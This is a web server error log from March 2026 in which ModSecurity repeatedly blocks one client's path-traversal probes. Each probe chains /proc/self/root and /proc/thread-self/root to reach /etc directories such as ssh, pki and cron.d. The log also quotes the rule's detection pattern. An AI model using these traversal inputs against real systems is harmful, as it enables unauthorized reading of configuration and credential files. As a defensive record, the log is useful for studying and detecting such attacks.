[Thu Mar 19 10:41:25.035642 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:44790] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9Bda6ubjKNq_cu4ZRKAAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:41:28.007496 2026] [:error] [pid 27293:tid 140411632822016] [client 74.7.243.128:45352] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9B_-YZRR_7pZ7nDKKVAAAA80"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:41:30.447271 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:40112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9CgkwaGbbGflqUZC-9gAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:41:38.125819 2026] [proxy_fcgi:error] [pid 30077:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:58138] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:41:39.891497 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:40126] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9E-oXxyEfFpUF8f8NMwAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:41:44.256276 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.243.128:38928] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9GPu8EFLIOrSqIpukCAAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:41:50.859911 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:38944] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9Hsdf6f5d65gmYZR1gQAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:41:53.274718 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.243.128:50552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9If-YZRR_7pZ7nDKKXwAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:41:58.733557 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:50558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9JuyqAr6etmhZHNpfgAAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:42:00.145857 2026] [proxy_fcgi:error] [pid 14269:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:58646] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:42:19.679428 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:53860] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9O8df6f5d65gmYZR1mQAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:42:23.707484 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:39942] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9PwkwaGbbGflqUZC_FQAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:42:25.365278 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:39952] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9Qfu8EFLIOrSqIpukJAAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:42:26.926449 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:39962] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9Qsdf6f5d65gmYZR1nwAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:42:27.133819 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:59306] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:42:34.007247 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:39968] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9Sta6ubjKNq_cu4ZRTQAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:42:43.743741 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:55334] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9U8df6f5d65gmYZR1sgAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:42:46.934354 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.243.128:50968] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9VgbLMZ6AikZjR9VcFAAAABQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:42:51.133790 2026] [proxy_fcgi:error] [pid 27293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:59804] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:42:51.325983 2026] [:error] [pid 19093:tid 140411548894976] [client 74.7.243.128:56202] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9W1_V7PWP6ixUYl67EQAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:42:54.950633 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.243.128:56212] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9Xsdf6f5d65gmYZR1uAAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:42:58.343355 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:56216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9YgkwaGbbGflqUZC_LQAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:43:01.567691 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:51992] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9Zcdf6f5d65gmYZR1uwAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:43:16.201826 2026] [proxy_fcgi:error] [pid 30077:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:60382] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:43:22.998413 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:52008] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9euyqAr6etmhZHNpfrAAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:43:28.342736 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:48872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9gMdf6f5d65gmYZR11QAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:43:33.395450 2026] [:error] [pid 27293:tid 140411548894976] [client 74.7.243.128:39550] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv9hf-YZRR_7pZ7nDKKmwAAA9c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:43:43.134269 2026] [proxy_fcgi:error] [pid 14269:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:32842] AH01075: Error dispatching request to : (polling)
